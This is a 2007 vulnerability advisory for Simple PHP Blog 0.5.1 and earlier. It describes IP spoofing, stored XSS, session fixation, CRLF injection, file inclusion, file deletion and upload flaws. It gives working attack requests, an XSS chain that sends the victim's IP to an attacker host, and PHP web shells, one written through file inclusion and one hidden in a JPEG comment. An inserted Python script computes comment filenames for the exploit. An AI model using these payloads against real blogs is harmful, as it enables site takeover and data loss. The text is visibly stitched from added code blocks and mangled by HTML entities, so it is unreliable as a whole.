Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

Reported by RootType, 23 Oct 2007 (seebug, www.seebug.org)

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities. Medium/High risk. IP Spoofing, Cross Site Scripting, Session Fixation, CRLF Injection, File Inclusion, File Deletion, File Upload Vulnerability, Code Execution

Code

       Title:   Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities
      Vendor:   http://sourceforge.net/projects/sphpblog/

    Advisory:   http://acid-root.new.fr/?0:15
      Author:   DarkFig < gmdarkfig (at) gmail (dot) com >

 Released on:   2007/10/21
   Changelog:   ----------
                                                    L   M   H   T
     Summary:   IP Spoofing                        [X] [_] [_] [X]
                Cross Site Scripting               [X] [_] [_] [X]
                Session Fixation                   [X] [_] [_] [X]
                mail() CRLF Injection              [X] [_] [_] [_]
                Local File Inclusion (+CSRF)       [_] [X] [_] [X]
                File Deletion (+CSRF)              [_] [X] [_] [X]
                File Upload Vulnerability          [_] [_] [X] [X]
                Code Execution (+CSRF)             [_] [_] [X] [X]

      Legend:   L - Low risk         M - Medium risk
                H - High risk        T - Tested

  Risk level:   Medium / High
         CVE:   ----------



  I - IP SPOOFING

  The file "scripts/sb_communicate.php" contains the following
  code:

  19| function getIP() {
  20|  if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
  21|      $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
  22|  }
  23|  else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
  24|      $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];
  25|  }
  26|  else if ( !empty ( $_SERVER[ 'REMOTE_ADDR' ] ) ) {
  27|      $ip = $_SERVER[ 'REMOTE_ADDR' ];
  28|  }
  29|  else if ( getenv( "HTTP_CLIENT_IP" ) ) {
  30|      $ip = getenv( "HTTP_CLIENT_IP" );
  31|  }
  32|  else if ( getenv( "HTTP_X_FORWARDED_FOR" ) ) {
  33|      $ip = getenv( "HTTP_X_FORWARDED_FOR" );
  34|  }
  35|  else if ( getenv( "REMOTE_ADDR" ) ) {
  36|      $ip = getenv( "REMOTE_ADDR" );
  37|  }
  38|  else {
  39|      $ip = "UNKNOWN";
  40|  }
  41|  return( $ip );
  42| }

  So an attacker can spoof his IP: he just has to craft an HTTP
  request with one extra header and send it. The request will
  look like this:

  GET /index.php HTTP/1.1\r\n
  Host: localhost\r\n
  X-Forwarded-For: 127.0.0.1\r\n
  Connection: keep-alive\r\n\r\n

  Later, we'll see how to obtain the administrator's session
  id. Even with the right session id, there is a check that
  "normally" prevents being logged in. Let's look at part of
  the file "scripts/sb_login.php":

  28| // Check if user is logged in.
  29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
    |             $_SESSION[ 'logged_in' ] == 'yes' ) {
    |
  30|   if ( $_SESSION[ 'site_path' ] ===
    |        dirname($_SERVER[ 'PHP_SELF' ]) ) {
    |
  31|     if ( $_SESSION[ 'ip' ] === getIP() ) {
  32|       // User is logged in.
  33|       return ( true );
  34|     }
  35|   }
  36| }

  Because of the getIP() function, if we know the
  administrator's IP (later we'll see how to get it easily),
  we can bypass the third condition.
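As an added illustration (not code from the advisory or from sphpblog), the Python below mirrors getIP()'s header precedence next to a resolver that only honours X-Forwarded-For when the socket peer is a configured reverse proxy and that validates every candidate as an IP address. The trusted_proxies list, the sample addresses and the session_ip_matches helper are assumptions.

```python
import ipaddress

# Constructed request headers (not captured traffic): the spoof from the
# advisory and the Client-IP variant it later uses for stored XSS.
SPOOFED = {"X-Forwarded-For": "127.0.0.1"}
SCRIPT_HEADER = {"Client-IP": "<script>alert(666)</script>"}


def vulnerable_get_ip(remote_addr, headers):
    """Mirror of sphpblog's getIP() precedence: any client-supplied
    Client-IP or X-Forwarded-For header wins over the socket peer."""
    for name in ("Client-IP", "X-Forwarded-For"):
        if headers.get(name):
            return headers[name]
    return remote_addr or "UNKNOWN"


def hardened_get_ip(remote_addr, headers, trusted_proxies=()):
    """Client address a server may use for access-control decisions.

    Rules:
      * REMOTE_ADDR (the socket peer) is the only value the client cannot
        forge, so it is the default answer.
      * X-Forwarded-For is consulted only when the peer is a trusted
        reverse proxy, and then only its right-most hop that is not itself
        a trusted proxy (the hop that proxy appended).
      * Every candidate must parse as an IP address; otherwise fall back
        to the peer. This also keeps HTML out of anything stored as an IP.
    """
    peer = ipaddress.ip_address(remote_addr)  # raises on garbage input
    trusted = [ipaddress.ip_network(p, strict=False) for p in trusted_proxies]

    def is_trusted(addr):
        return any(addr in net for net in trusted)

    if not is_trusted(peer):
        return str(peer)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # forged or malformed: do not trust the header
        if not is_trusted(addr):
            return str(addr)
    return str(peer)


def session_ip_matches(session_ip, remote_addr, headers, trusted_proxies=()):
    """The sb_login.php comparison, done against the hardened value (assumed helper)."""
    return session_ip == hardened_get_ip(remote_addr, headers, trusted_proxies)
```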



  II - CROSS SITE SCRIPTING

  When a guest adds a comment, an HTTP request is sent to
  "comment_add_cgi.php". Before the comment is written to a
  file, several conditions are checked; the first one is that
  the IP sent in the POST body must be the same as the IP
  returned by the getIP() function. Let's see the code:

  88| if ($ok) {
  89|   // Verify that posted IP and actual IP matches.
  90|   if ( getIP() === $_POST['user_ip'] ) {
  91|     $ipMatches = true;
  92|   } else {
  93|     $ipMatches = false;
  94|     $ok = false;
  95|     $error_message = $lang_string[ 'error_no_match' ];
  96|   }
  97| }

  This check is useless; I don't know what the author wanted to
  do, but it can be bypassed easily. After some more conditions,
  the write_comment() function is called:

  219| $result = write_comment( $_POST[ 'y' ], $_POST[ 'm' ],
     |           $_POST[ 'entry' ],
  220|           $comment_name,
  221|           $comment_email,
  222|           $comment_url,
  223|           $comment_text,
  224|           $_POST[ 'user_ip' ],
  225|           $moderationFlag,
  226|           time() );

  This function lives in "scripts/sb_comments.php".
  Let's see the data that will be stored in the file:

  519| // Save the file
  520| $save_data = array();
  521| $save_data[ 'VERSION' ] = $sb_info[ 'version' ];
  522| $save_data[ 'NAME' ] = clean_post_text( $comment_name );
  523| $save_data[ 'DATE' ] = $comment_date;
  524| $save_data[ 'CONTENT' ] = sb_parse_url( clean_post_text( $comment_text ) );
     |
  525| if ( $comment_email != '' ) {
  526|   $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
  527| }
     |
  528| if ( $comment_url != '' ) {
  529|   $save_data[ 'URL' ] = clean_post_text( $comment_url );
  530| }
     |
  531| $save_data[ 'IP-ADDRESS' ] = $user_ip; // New 0.4.8
  532| $save_data[ 'MODERATIONFLAG' ] = $hold_flag;
  533|
  534| // Implode the array
  535| $str = implode_with_keys( $save_data );
  536|
  537| // Save the file
  538| $result = sb_write_file( $entryFile, $str );

  The clean_post_text() function protects against XSS; it also
  replaces the field separator (with its HTML entity) that is
  used when the comment's data are read back. This function is
  in the file "scripts/sb_formatting.php":

  13| function clean_post_text( $str ) {
  14|   // Cleans post text input.
  15|   //
  16|   // Strip out and replace pipes with colons. HTML-ize entities.
  17|   // Use charset from the language file to make sure we're only
  18|   // encoding stuff that needs to be encoded.
  19|   //
  20|   // This makes entries safe for saving to a file (since the data
  21|   // format is pipe delimited.)
  22|   global $lang_string;
  23|   $str = str_replace( '|', '&#124;', $str );
  24|   $str = @htmlspecialchars( $str, ENT_QUOTES, $lang_string[ 'php_charset' ] );
  25|
  26|   return ( $str );
  27| }

  The clean_post_text() function isn't applied to the IP
  address that is stored in the file, so this can be exploited
  to conduct an XSS attack. The attacker sends an HTTP request
  like this one:

  POST /comment_add_cgi.php HTTP/1.1\r\n
  Host: localhost\r\n
  Client-IP: <script>alert(666)</script>\r\n
  Connection: keep-alive\r\n
  Content-Type: application/x-www-form-urlencoded\r\n
  Content-Length: 229\r\n\r\n
  y=07&m=07&entry=entry070727-161718&comment_name=HereMyName
  &comment_email=&comment_url=&user_ip=<script>alert(666)</script>
  &style_dropdown=--&comment_text=This+is+an+example+comment.
  &comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n

  The sender's IP address can only be seen by a registered user,
  so the code sent by the attacker is executed when a registered
  user views the comments page.



  III - SESSION FIXATION

  In a session fixation attack, the attacker has to set the
  victim's session id. In our case, the attacker fixes the
  user's session id; the victim, who is logged in, gets logged
  out when the cookie is set, and if the victim then logs in
  again, the fixed session id is registered on the server.
  Let's look at part of the logged_in() function:

  11| function logged_in ( $redirect_to_login, $redirect_to_setup ) {
  12|
  13|   // Turn off URL SIDs.
  14|   ini_set('url_rewriter.tags','');
  15|   ini_set('session.use_trans_sid', false);
  16|
  17|   // Init the session.
  18|   session_set_cookie_params(60*60*24*5);
  19|
  20|   // Check if the user has a client-side cookie.
  21|   if ( isset( $_COOKIE[ 'sid' ] ) ) {
  22|     session_id($_COOKIE[ 'sid' ]);
  23|   }
  24|
  25|   // Start the session.
  26|   session_start ();
  27|
  28| // Check if user is logged in.
  29| if ( isset( $_SESSION[ 'logged_in' ] ) &&
    |             $_SESSION[ 'logged_in' ] == 'yes' ) {
    |
  30|   if ( $_SESSION[ 'site_path' ] ===
    |        dirname($_SERVER[ 'PHP_SELF' ]) ) {
    |
  31|     if ( $_SESSION[ 'ip' ] === getIP() ) {
  32|       // User is logged in.
  33|       return ( true );
  34|     }
  35|   }
  36| }

  Afterwards, the attacker, who knows the session id, just has
  to use it to be logged in to the victim's account. But in our
  case, he must also know the victim's IP. I'll demonstrate how
  administrator rights can be obtained even if the victim has a
  protection against XSS (the NoScript Firefox plugin, for
  example). First, the attacker fixes the victim's session id
  by setting a cookie in the victim's browser. Then he also
  forces the victim's browser to connect to a script that
  records the victim's IP. Take a look at this diagram:

 +-----------------------------------------------------------+
 | The attacker posts a comment using the XSS vulnerability. |
 | The code which will be executed in the client browser     |
 | will set the "sid" cookie; it will also force the         |
 | victim's web browser to send an HTTP request to a script  |
 | that will mail the victim's IP to the attacker.           |
 +-----------------------------------------------------------+
 |
 |    +---------------------------------------------------+
 +--> | <meta http-equiv=Set-Cookie content=sid=MD5HERE;> |
      | <img src=http://attacker.com/getip_and_mail.php>  |
      +---------------------------------------------------+
                                                          |
   +-------------------------------------------------+    |
   | The victim, who is logged in, has to see the    | <--+
   | comments page. Once seen, the victim will be    |
   | logged out.                                     |
   +-------------------------------------------------+
   |
   |    +------------------------------------------+
   +--> | The victim logs in again. Now that she's |
        | logged in, the session id set by the     |
        | attacker is registered on the server.    |
        +------------------------------------------+
                                                   |
  +--------------------------------------------+   |
  | Now the attacker just has to send an HTTP  |<--+
  | request that contains the session id and a |
  | special header with the victim's IP.       |
  | The attacker is logged in to the victim's  |
  | account.                                   |
  +--------------------------------------------+

  As you can see, even if the victim is protected against XSS,
  it's still possible to get administrator rights with this type
  of attack; we just use the "meta" and "img" tags.



  IV - MAIL() CRLF INJECTION

  User-supplied variables are not checked before being used in
  the mail() function. The file "comment_add_cgi.php" calls the
  write_comment() function with the following parameters:

  214| $comment_name = sb_stripslashes($_POST['comment_name']);
  215| $comment_email = sb_stripslashes($_POST['comment_email']);
  216| $comment_url = sb_stripslashes($_POST['comment_url']);
  217| $comment_text = sb_stripslashes($_POST['comment_text']);
  218|
  219| $result = write_comment($_POST[ 'y' ],$_POST[ 'm' ],
     |           $_POST['entry' ],
  220|           $comment_name,
  221|           $comment_email,
  222|           $comment_url,
  223|           $comment_text,
  224|           $_POST[ 'user_ip' ],
  225|           $moderationFlag,
  226|           time() );

  Then clean_post_text() is applied to $comment_email. But this
  function doesn't protect against CRLF injection: it does not
  replace the \r and \n characters. Take a look at the file
  "sb_comments.php":

  471| function write_comment($y,$m,$entry,$comment_name,$comment_email
     |
  525| if ( $comment_email != '' ) {
  526|      $save_data[ 'EMAIL' ] = clean_post_text( $comment_email );
  527| }
     |
  584| // Send the Email
  585| if ( array_key_exists( 'EMAIL', $save_data ) ) {
  586|   sb_mail( $save_data[ 'EMAIL' ], $blog_config[ 'blog_email' ],
     |            $subject, $body, false );
  587| }

  The sb_mail() function is designed to send mass emails. As you
  can see below, $save_data[ 'EMAIL' ] is placed in the headers
  without any filtering.

   45|   function sb_mail ($from, $to, $subject, $body, $text=true, $priority=3) {
     |
   69|   $headers .= 'From: ' . $from . " \r\n";
   70|   $headers .= 'Reply-To: ' . $from . " \r\n";
   71|   $headers .= 'Return-Path: ' . $from . " \r\n";
     |
   76|   ini_set('sendmail_from', $from);
   77|   for ( $j=0; $j < count($to_array); $j++ ) {
   78|   $result = mail( $to_array[$j], sb_stripslashes($subject),
     |                   sb_stripslashes($body), $headers );
   79|   }
   80|  ini_restore('sendmail_from');

  So an attacker can perform a CRLF injection attack through the
  mail() function; this would most likely be abused by spammers.



&nbsp;&nbsp;V&nbsp;-&nbsp;LOCAL&nbsp;FILE&nbsp;INCLUSION&nbsp;(+CSRF)

&nbsp;&nbsp;There&nbsp;is&nbsp;an&nbsp;LFI&nbsp;vulnerability&nbsp;(admin&nbsp;rights&nbsp;needed)
&nbsp;&nbsp;in&nbsp;the&nbsp;file&nbsp;&quot;languages_cgi.php&quot;:

&nbsp;&nbsp;76|&nbsp;	if&nbsp;(&nbsp;array_key_exists(&nbsp;'store_data',&nbsp;$_GET&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;77|&nbsp;	
&nbsp;&nbsp;78|&nbsp;	//&nbsp;Store&nbsp;all&nbsp;the&nbsp;data&nbsp;from&nbsp;language&nbsp;2
&nbsp;&nbsp;79|&nbsp;	require_once('languages/'&nbsp;.&nbsp;$_GET[&nbsp;'lang2'&nbsp;]&nbsp;.&nbsp;'/strings.php');

&nbsp;&nbsp;This&nbsp;will&nbsp;require&nbsp;magic_quotes_gpc=Off.&nbsp;Because&nbsp;they&nbsp;use&nbsp;the
&nbsp;&nbsp;GET&nbsp;method,&nbsp;there's&nbsp;a&nbsp;CSRF&nbsp;vulnerability&nbsp;too.&nbsp;For&nbsp;each&nbsp;new
&nbsp;&nbsp;comments,&nbsp;a&nbsp;new&nbsp;text&nbsp;file&nbsp;is&nbsp;created.&nbsp;The&nbsp;structure&nbsp;of&nbsp;the&nbsp;file
&nbsp;&nbsp;like&nbsp;this:

&nbsp;&nbsp;VERSION|0.4.8
&nbsp;&nbsp;|NAME|&lt;my_name&gt;
&nbsp;&nbsp;|DATE|1188078694
&nbsp;&nbsp;|CONTENT|&lt;my_comment&gt;
&nbsp;&nbsp;|EMAIL|&lt;my_email&gt;
&nbsp;&nbsp;|IP-ADDRESS|&lt;my_ip_or_xss&gt;
&nbsp;&nbsp;|MODERATIONFLAG|H

&nbsp;&nbsp;Now&nbsp;imagine&nbsp;that&nbsp;an&nbsp;attacker&nbsp;use&nbsp;the&nbsp;XSS&nbsp;vulnerability&nbsp;to&nbsp;post
&nbsp;&nbsp;php&nbsp;code&nbsp;and&nbsp;html&nbsp;tags&nbsp;which&nbsp;will&nbsp;make&nbsp;the&nbsp;admin&nbsp;sent&nbsp;an&nbsp;HTTP
&nbsp;&nbsp;request&nbsp;to&nbsp;exploit&nbsp;the&nbsp;LFI&nbsp;vuln.&nbsp;The&nbsp;XSS&nbsp;code&nbsp;will&nbsp;look's&nbsp;like
&nbsp;&nbsp;this:

&nbsp;&nbsp;&lt;!---&nbsp;&lt;?php
&nbsp;&nbsp;$handle&nbsp;=&nbsp;fopen('./themes/back.php',&nbsp;'w+');
&nbsp;&nbsp;fwrite($handle,&nbsp;'&lt;?php&nbsp;@eval($_SERVER[HTTP_SHELL]);&nbsp;?&gt;');
&nbsp;&nbsp;fclose($handle);
&nbsp;&nbsp;mail('[email protected]',&nbsp;'hey',&nbsp;'code&nbsp;executed');
&nbsp;&nbsp;exit();
&nbsp;&nbsp;/*&nbsp;---&gt;
&nbsp;&nbsp;&lt;img&nbsp;src=http://&lt;site&gt;/languages_cgi.php?store_data=1&amp;lang2=
&nbsp;&nbsp;../content/07/07/entry070727-161718/comments/comment070825-235134.txt%00&gt;
&nbsp;&nbsp;&lt;!---&nbsp;*/
&nbsp;&nbsp;?&gt;&nbsp;---&gt;

&nbsp;&nbsp;In&nbsp;order&nbsp;to&nbsp;exploit&nbsp;this,&nbsp;the&nbsp;attacker&nbsp;must&nbsp;know&nbsp;where&nbsp;the&nbsp;new
&nbsp;&nbsp;file&nbsp;will&nbsp;be&nbsp;created.&nbsp;Let's&nbsp;see&nbsp;the&nbsp;code:

&nbsp;&nbsp;471|&nbsp;&nbsp;&nbsp;function&nbsp;write_comment&nbsp;(&nbsp;$y,&nbsp;$m,&nbsp;$entry,&nbsp;$comment_name,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;$comment_email,&nbsp;$comment_url,&nbsp;$comment_text,&nbsp;$user_ip,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;$hold_flag='',&nbsp;$comment_date=null&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;478|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$basedir&nbsp;=&nbsp;'content/';
&nbsp;&nbsp;479|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;=&nbsp;$basedir.$y.'/'.$m.'/'.$entry;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;494|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;.=&nbsp;'/comments';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;
&nbsp;&nbsp;506|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$dir&nbsp;&nbsp;.=&nbsp;'/';
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;512|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$stamp&nbsp;=&nbsp;date('ymd-His');
&nbsp;&nbsp;513|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$blog_config[&nbsp;'blog_enable_gzip_txt'&nbsp;]&nbsp;)&nbsp;{
&nbsp;&nbsp;514|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$entryFile&nbsp;=&nbsp;$dir.'comment'.$stamp.'.txt.gz';
&nbsp;&nbsp;515|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}&nbsp;else&nbsp;{
&nbsp;&nbsp;516|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$entryFile&nbsp;=&nbsp;$dir.'comment'.$stamp.'.txt';
&nbsp;&nbsp;517|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}

  The variables $y, $m and $entry are sent with the HTTP request.
  The filename is built from date('ymd-His'), i.e. the server's
  local time to the second. There are several ways to learn what
  $stamp will be:
  - Ask the server: the "Date" header of any HTTP response gives its
    clock (in GMT; the server's timezone still has to be guessed).
  - Bruteforce the path (add several html tags, one per candidate
    filename).
  - Split the attack in two parts: post the comment first, then read
    the filename back, since filenames are displayed in the html source.

  The attacker must also urlencode the content of his XSS, so the
  HTTP request will finally look like this:

  POST /comment_add_cgi.php HTTP/1.1
  Host: localhost
  Connection: keep-alive
  Cookie: PHPSESSID=<SID>
  Client-IP: <HTML_AND_PHP_CONTENT>
  Content-Type: application/x-www-form-urlencoded
  Content-Length: <LEN>

  y=<Y>&m=<M>&entry=<ENTRY>&comment_name=Hacker
  &comment_email=my%40you.com&comment_url=&user_ip=
  <HTML_AND_PHP_CONTENT_URLENCODED>
  &style_dropdown=--&comment_text=Hello&comment_capcha
  =128619&submit=%A0Post+Comment%A0

  Now the attacker has to wait until the admin views his comment.
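  The first of the three options above (asking the server for its clock)
  can be automated. The script below is an added example and not part of
  the advisory: it turns an HTTP "Date" header into the filenames that
  write_comment() can produce around that instant. PHP's date() uses the
  server's local time while the Date header is always GMT, so the server's
  UTC offset is an assumption the attacker has to learn (for example from
  the timestamps printed next to entries). The values of $y, $m and $entry
  used in the demo are placeholders, not values taken from the blog.

```python
"""Predict the comment filename that sphpblog's write_comment() will choose.

Added example, not part of the advisory. The file is named
'comment' . date('ymd-His') . '.txt' (or '.txt.gz' when gzip is enabled)
under content/<y>/<m>/<entry>/comments/. The window covers the second or
two that pass between reading the Date header and the comment being written.
"""
from datetime import timedelta, timezone
from email.utils import parsedate_to_datetime


def php_stamp(dt):
    """Equivalent of PHP date('ymd-His')."""
    return dt.strftime("%y%m%d-%H%M%S")


def candidate_comment_files(date_header, utc_offset_hours=0.0,
                            window_seconds=3, gzip_enabled=False):
    """Filenames the server may produce around the instant in `date_header`,
    closest guess first. `utc_offset_hours` is the (assumed) server timezone."""
    server_tz = timezone(timedelta(hours=utc_offset_hours))
    server_now = parsedate_to_datetime(date_header).astimezone(server_tz)
    suffix = ".txt.gz" if gzip_enabled else ".txt"
    names = []
    # 0, -1, +1, -2, +2 ...: the exact second first, then widen outwards
    for delta in sorted(range(-window_seconds, window_seconds + 1), key=abs):
        names.append("comment" + php_stamp(server_now + timedelta(seconds=delta)) + suffix)
    return names


def comment_path(y, m, entry, filename):
    """Relative path exactly as write_comment() builds it:
    $basedir.$y.'/'.$m.'/'.$entry.'/comments/'.$filename"""
    return "content/%s/%s/%s/comments/%s" % (y, m, entry, filename)


if __name__ == "__main__":
    # Constructed Date header; a real one comes from any response of the target.
    header = "Sun, 21 Oct 2007 14:05:09 GMT"
    for name in candidate_comment_files(header, utc_offset_hours=2):
        print(comment_path("07", "10", "entry1", name))
```

  Each candidate path can then be used as the target of one of the
  "several html tags" of the bruteforce variant.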



  VI - FILE DELETION (+CSRF)

  There is a CSRF vulnerability which can lead to file
  deletion. Let's see the code of "trackback_delete_cgi.php":

  22| if ( array_key_exists( 'trackback', $_GET ) ) {
  23| 	$ok = delete_trackback( $_GET[ 'trackback' ] );
  24| }

  So if the variable "trackback" is set with the GET method,
  the delete_trackback() function is called with it. The code of
  this function is located in "sb_trackback.php":

  229| 	function delete_trackback ( $entryFile ) {
  230| 		// Delete the old file
  231| 		if ( file_exists( $entryFile ) ) {
  232| 			$ok = sb_delete_file( $entryFile );
  233| 		}

  If the file exists, the function sb_delete_file() is called
  with $_GET['trackback'] as parameter. The source code
  of this function is located in the file "sb_fileio.php":

  171|   function sb_delete_file ( $filename ) {
     |
  175|     clearstatcache();
  176|     if ( file_exists( $filename ) ) {
  177|       $result = @unlink( $filename );
  178|     }

  There is no check on the path before deleting the file: no
  restriction to the content directory, no filter on "../" and no
  extension whitelist. So any file the web server process is allowed
  to unlink can be deleted. The HTTP request sent by the attacker
  will look like this:

  GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
  Host: localhost\r\n
  Connection: keep-alive\r\n\r\n

  Admin rights are needed to reach this script, but since the
  deletion is triggered by a plain GET request with no anti-CSRF
  token, the attacker can embed it in his XSS (e.g. as an <img>
  source) and the admin's browser will send it; the attacker
  himself doesn't need admin rights.
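  The missing check is a path-containment test. The following is an
  added example written for this page, not sphpblog code: it models
  the vulnerable behaviour of sb_delete_file() (file_exists() then
  unlink(), nothing else) next to a hardened delete that only removes
  regular files resolving inside the content/ tree and carrying the
  extensions the blog itself writes. The directory layout in the demo
  is constructed in a temporary directory; the CSRF side of the bug is
  a separate fix (a per-session token on the delete request) and is not
  modelled here.

```python
"""Vulnerable versus contained file deletion (added example, not sphpblog code)."""
import os
import tempfile


def vulnerable_delete(path):
    """Mirrors sb_delete_file(): if it exists, unlink it. No other check."""
    if os.path.exists(path):
        os.unlink(path)
        return True
    return False


def safe_delete(user_path, content_root, allowed_suffixes=(".txt", ".txt.gz")):
    """Delete only a regular file that resolves inside `content_root` and
    has one of the extensions the blog itself creates."""
    root = os.path.realpath(content_root)
    # realpath() collapses '../' and follows symlinks before the comparison;
    # an absolute user_path overrides root in join() and is caught just below.
    target = os.path.realpath(os.path.join(root, user_path))
    if os.path.commonpath([root, target]) != root:
        return False  # escapes content/
    if not target.endswith(allowed_suffixes):
        return False  # not a comment/trackback file
    if not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo():
    """Run both deleters against a constructed blog layout; returns what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        content = os.path.join(tmp, "content")
        comments = os.path.join(content, "07", "10", "entry1", "comments")
        os.makedirs(comments)
        os.makedirs(os.path.join(tmp, "config"))
        comment = os.path.join(comments, "comment071021-140509.txt")
        users = os.path.join(tmp, "config", "users.php")  # outside content/
        for p in (comment, users):
            open(p, "w").close()

        # 1) the original logic removes anything that exists, users.php included
        vuln = vulnerable_delete(users)
        open(users, "w").close()  # put it back for the hardened run

        # 2) hardened: traversal and absolute paths out of content/ are refused ...
        traversal = safe_delete("../config/users.php", content)
        absolute = safe_delete(users, content)
        # ... while the blog's own comment file is still deletable
        legit = safe_delete("07/10/entry1/comments/comment071021-140509.txt", content)

        return {
            "vulnerable_deleted_users_php": vuln,
            "safe_refused_traversal": (not traversal) and os.path.exists(users),
            "safe_refused_absolute": not absolute,
            "safe_deleted_comment": legit and not os.path.exists(comment),
        }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(check, outcome)
```

  The containment test must run on the resolved path: comparing the raw
  string against "content/" would still let "content/../config/users.php"
  or a symlink planted inside content/ through.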



  VII - FILE UPLOAD VULNERABILITY

  When we're admin, we can upload emoticons.
  Let's see the content of the function upload_emoticons()
  which is located in the file "emoticons.php":

  36| function upload_emoticons() {
  37| 	// Emoticon upload form results
  38| 	$path = 'images/emoticons';
  39| 	$uploaddir = $path;
  40| 	
  41| 	$ok = false;
  42| 	if ( $_FILES[ 'user_emot' ][ 'error' ] == 0 ) {
  43| 	if (!file_exists($uploaddir)) {
  44| 		$oldumask = umask(0);
  45| 		@mkdir($uploaddir, 0777 );
  46| 		@umask($oldumask);
  47| 	}
  48| 		
  49| 	$uploaddir .= '/';
  50| 	$uploadfile = $uploaddir.
    |                 preg_replace("/ /","_",$_FILES[ 'user_emot' ][ 'name' ]);
  51| 
  52| 	if (@is_uploaded_file($_FILES['user_emot']['tmp_name'])) {
    |
  53| 	if (@getimagesize($_FILES['user_emot']['tmp_name']) == FALSE){
  54| 		$ok = -1;
    |
  55| 	} else {
    |
  56| 	if (@move_uploaded_file($_FILES['user_emot']['tmp_name'], $uploadfile)){
  57| 		chmod( $uploadfile, 0777 );
  58| 		$ok = true;
  59| 	}

  As you can see, there is only one protection against a malicious
  upload: getimagesize() returns FALSE if the uploaded file isn't a
  valid image. The destination name is the client-supplied filename
  (only spaces are replaced), so the extension is never checked and
  a ".php" file is accepted as long as it parses as an image. We can
  bypass this easily. Take a look at this:

  C:\>edjpgcom img1x1.jpg

  C:\>hexdump img1x1.jpg

  ff d8 ff e0 00 10 4a 46 - 49 46 00 01 01 01 00 60   ......JF IF......
  00 60 00 00 ff db 00 43 - 00 08 06 06 07 06 05 08   .......C ........
  07 07 07 09 09 08 0a 0c - 14 0d 0c 0b 0b 0c 19 12   ........ ........
  13 0f 14 1d 1a 1f 1e 1d - 1a 1c 1c 20 24 2e 27 20   ........ ........
  22 2c 23 1c 1c 28 37 29 - 2c 30 31 34 34 34 1f 27   ......7. .01444..
  39 3d 38 32 3c 2e 33 34 - 32 ff db 00 43 01 09 09   9.82..34 2...C...
  09 0c 0b 0c 18 0d 0d 18 - 32 21 1c 21 32 32 32 32   ........ 2...2222
  32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32   22222222 22222222
  32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 32 32   22222222 22222222
  32 32 32 32 32 32 32 32 - 32 32 32 32 32 32 ff fe   22222222 222222..
  00 26 3c 3f 70 68 70 20 - 65 76 61 6c 28 24 5f 53   ....php. eval...S
  45 52 56 45 52 5b 48 54 - 54 50 5f 53 48 45 4c 4c   ERVER.HT TP.SHELL
  5d 29 3b 20 3f 3e ff c0 - 00 11 08 00 01 00 01 03   ........ ........
  01 22 00 02 11 01 03 11 - 01 ff c4 00 1f 00 00 01   ........ ........
  05 01 01 01 01 01 01 00 - 00 00 00 00 00 00 00 01   ........ ........
  02 03 04 05 06 07 08 09 - 0a 0b ff c4 00 b5 10 00   ........ ........
  02 01 03 03 02 04 03 05 - 05 04 04 00 00 01 7d 01   ........ ........
  02 03 00 04 11 05 12 21 - 31 41 06 13 51 61 07 22   ........ 1A..Qa..
  71 14 32 81 91 a1 08 23 - 42 b1 c1 15 52 d1 f0 24   q.2..... B...R...
  33 62 72 82 09 0a 16 17 - 18 19 1a 25 26 27 28 29   3br..... ........
  2a 34 35 36 37 38 39 3a - 43 44 45 46 47 48 49 4a   .456789. CDEFGHIJ
  53 54 55 56 57 58 59 5a - 63 64 65 66 67 68 69 6a   STUVWXYZ cdefghij
  73 74 75 76 77 78 79 7a - 83 84 85 86 87 88 89 8a   stuvwxyz ........
  92 93 94 95 96 97 98 99 - 9a a2 a3 a4 a5 a6 a7 a8   ........ ........
  a9 aa b2 b3 b4 b5 b6 b7 - b8 b9 ba c2 c3 c4 c5 c6   ........ ........
  c7 c8 c9 ca d2 d3 d4 d5 - d6 d7 d8 d9 da e1 e2 e3   ........ ........
  e4 e5 e6 e7 e8 e9 ea f1 - f2 f3 f4 f5 f6 f7 f8 f9   ........ ........
  fa ff c4 00 1f 01 00 03 - 01 01 01 01 01 01 01 01   ........ ........
  01 00 00 00 00 00 00 01 - 02 03 04 05 06 07 08 09   ........ ........
  0a 0b ff c4 00 b5 11 00 - 02 01 02 04 04 03 04 07   ........ ........
  05 04 04 00 01 02 77 00 - 01 02 03 11 04 05 21 31   ......w. .......1
